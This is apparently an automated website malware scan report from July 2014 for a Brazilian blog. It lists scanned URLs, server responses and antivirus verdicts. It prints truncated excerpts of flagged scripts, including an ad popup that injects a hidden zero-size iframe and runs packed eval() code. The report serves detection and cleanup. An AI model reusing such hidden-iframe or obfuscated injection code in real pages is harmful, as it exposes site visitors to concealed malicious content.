Malware Scanner report for entrecoisas.com.br

Malicious/Suspicious/Total urls checked: 4/0/20

4 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/9

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://entrecoisas.com.br/	HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 01 Jul 2014 18:13:58 GMT Location: http://www.entrecoisas.com.br/ Server: ghs Content-Length: 227 Content-Type: text/html; charset=UTF-8 Alternate-Protocol: 80:quic X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block	clean
http://www.entrecoisas.com.br/	200 OK Content-Length: 149706 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function stripHtmlTags(s,max){return s.replace(/<.?>/ig, '').split(/\s+/).slice(0,max-1).join(' ')} function getSummaryLikeWP(id) { return document.getElementById(id).innerHTML.split(/<!--\smore\s-->/)[0]; } function getSummaryImproved(post,max){ var re = /<.?>/gi var re2 = /<br.?>/gi var re3 = /(<\/{1}p>)\|(<\/{1}div>)/gi var re4 = /(<style.?\/{1}style>)\|(< ... 1755 bytes are skipped ...se { imgtag = '<div class="thumbnailimg" align="center"><img src="'+img[0].src+'" /></div>'; summ = summary_img; } } var summary = (classicMode) ? imgtag + '<div>' + stripHtmlTags(content,summ) + '</div>' : imgtag + '<div>' + getSummaryImproved(content,summ) + '</div>'; div.innerHTML = summary; div.style.display = "block"; } } Antivirus reports: Emsisoft Win32.Worm.Mabezat.Gen (B)
http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js	200 OK Content-Length: 55740 Content-Type: text/javascript	clean
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js	200 OK Content-Length: 57254 Content-Type: text/javascript	clean
http://ads.egrana.com.br/anuncio/popup/1567	200 OK Content-Length: 6553 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe style="display:none" src="http://ads.egrana.com.br/stats/pop/" width="0" height="0" frameborder="0" marginwidh="0" marginheight="0" scrolling="no"></iframe>');eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]\|\|e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+' ... 5916 bytes are skipped ...ialogHeight\|opera\|adc\|resizeTo\|moveTo\|opener\|750\|850\|1850\|950\|141144143141163150\|frameborder\|hidden\|backgroundColor\|transparent\|opacity\|\|\|cursor\|pointer\|position\|absolute\|zIndex\|999\|pageY\|pageX\|79\|form\|form141144143141163150\|input\|type\|clearInterval\|setInterval\|1024\|768\|a616463736899\|documentElement\|webkitRequestFullscreen\|Element\|ALLOW_KEYBOARD_INPUT\|webkitCancelFullScreen\|a6164637368\|data\|text\|html\|charset\|utf\|encodeURI\|536\|onclick\|2000\|beforeunload\|loadScript\|scripts\|pop\|js'.split('\|'),0,{})) Antivirus reports: AntiVir HTML/TwitScroll.B Avast JS:Iframe-ALS [Trj] nProtect Trojan.Iframe.BZW Comodo TrojWare.JS.Iframe.FK McAfee-GW-Edition JS/IFrame.gen.j Kaspersky HEUR:Trojan.Script.Generic Microsoft Exploit:HTML/IframeRef.DM MicroWorld-eScan Trojan.Iframe.BZW PCTools Exploit.IFrame McAfee JS/IFrame.gen.j NANO-Antivirus Trojan.Html.TwitScroll.bklyhq F-Secure Trojan.Iframe.BZW VIPRE Exploit.HTML.Iframe.dm (v) AVG HTML/Framer Norman Iframe.UW Sophos Troj/Iframe-JG GData Trojan.Iframe.BZW Symantec IFrame.Exploit ESET-NOD32 JS/Iframe.HH BitDefender Trojan.Iframe.BZW
http://pagead2.googlesyndication.com/pagead/show_ads.js	200 OK Content-Length: 21217 Content-Type: text/javascript	clean
http://entrecoisas.com.br//cdn.chitika.net/getads.js/	HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 01 Jul 2014 18:14:00 GMT Location: http://www.entrecoisas.com.br//cdn.chitika.net/getads.js/ Server: ghs Content-Length: 254 Content-Type: text/html; charset=UTF-8 Alternate-Protocol: 80:quic X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block	clean
http://www.entrecoisas.com.br//cdn.chitika.net/getads.js/	404 Not Found Content-Length: 106862 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function stripHtmlTags(s,max){return s.replace(/<.?>/ig, '').split(/\s+/).slice(0,max-1).join(' ')} function getSummaryLikeWP(id) { return document.getElementById(id).innerHTML.split(/<!--\smore\s-->/)[0]; } function getSummaryImproved(post,max){ var re = /<.?>/gi var re2 = /<br.?>/gi var re3 = /(<\/{1}p>)\|(<\/{1}div>)/gi var re4 = /(<style.?\/{1}style>)\|(< ... 1755 bytes are skipped ...se { imgtag = '<div class="thumbnailimg" align="center"><img src="'+img[0].src+'" /></div>'; summ = summary_img; } } var summary = (classicMode) ? imgtag + '<div>' + stripHtmlTags(content,summ) + '</div>' : imgtag + '<div>' + getSummaryImproved(content,summ) + '</div>'; div.innerHTML = summary; div.style.display = "block"; } } Antivirus reports: Emsisoft Win32.Worm.Mabezat.Gen (B)
http://lizard1301.spider.ad/spd_display?p1=7855.divSpdSuperBanner	200 OK Content-Length: 3 Content-Type: text/html	clean
http://lizard1301.spider.ad/test404page.js	404 Not Found Content-Length: 212 Content-Type: text/html	clean
http://728x90.exad.me/js/?id=6560	200 OK Content-Length: 120 Content-Type: text/html	clean
http://www.linkwithin.com/widget.js	200 OK Content-Length: 14131 Content-Type: application/x-javascript	clean
http://entrecoisas.com.br//s7.addthis.com/js/300/addthis_widget.js/	HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 01 Jul 2014 18:14:03 GMT Location: http://www.entrecoisas.com.br//s7.addthis.com/js/300/addthis_widget.js/ Server: ghs Content-Length: 268 Content-Type: text/html; charset=UTF-8 Alternate-Protocol: 80:quic X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block	clean
http://www.entrecoisas.com.br//s7.addthis.com/js/300/addthis_widget.js/	404 Not Found Content-Length: 106918 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function stripHtmlTags(s,max){return s.replace(/<.?>/ig, '').split(/\s+/).slice(0,max-1).join(' ')} function getSummaryLikeWP(id) { return document.getElementById(id).innerHTML.split(/<!--\smore\s-->/)[0]; } function getSummaryImproved(post,max){ var re = /<.?>/gi var re2 = /<br.?>/gi var re3 = /(<\/{1}p>)\|(<\/{1}div>)/gi var re4 = /(<style.?\/{1}style>)\|(< ... 1755 bytes are skipped ...se { imgtag = '<div class="thumbnailimg" align="center"><img src="'+img[0].src+'" /></div>'; summ = summary_img; } } var summary = (classicMode) ? imgtag + '<div>' + stripHtmlTags(content,summ) + '</div>' : imgtag + '<div>' + getSummaryImproved(content,summ) + '</div>'; div.innerHTML = summary; div.style.display = "block"; } } Antivirus reports: Emsisoft Win32.Worm.Mabezat.Gen (B)
http://300x250.exad.me/js/?id=6783	200 OK Content-Length: 121 Content-Type: text/html	clean
http://ads.egrana.com.br/anuncio/300x250/1567	200 OK Content-Length: 660 Content-Type: text/html	clean
http://ads.egrana.com.br/click.php?f=30&a=99&s=1567	HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 01 Jul 2014 18:15:18 GMT Pragma: no-cache Location: http://ad.zanox.com/ppc/?26093113C2022580779T Server: nginx/1.0.15 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Country: LT Set-Cookie: PHPSESSID=ojgbdrah3g77608nqugiqepq01; path=/ X-Powered-By: PHP/5.4.28	clean
http://ad.zanox.com/ppc/?26093113c2022580779t	HTTP/1.1 302 Found Cache-Control: no-cache Connection: close Pragma: no-cache Location: /ppc/?26093113c2022580779t	clean
http://lizard1301.spider.ad/spd_display?p1=7855.divSpdRetangulo	200 OK Content-Length: 3 Content-Type: text/html	clean
http://lizard1301.spider.ad/spd_display?p1=7855.divSpdWideSky	200 OK Content-Length: 3 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: entrecoisas.com.br

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 01 Jul 2014 18:13:58 GMT
Location: http://www.entrecoisas.com.br/
Server: ghs
Content-Length: 227
Content-Type: text/html; charset=UTF-8
Alternate-Protocol: 80:quic
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block

...227 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: entrecoisas.com.br
Referer: http://www.google.com/search?q=entrecoisas.com.br

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=entrecoisas.com.br

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://entrecoisas.com.br/

Result: entrecoisas.com.br is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for entrecoisas.com.br

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools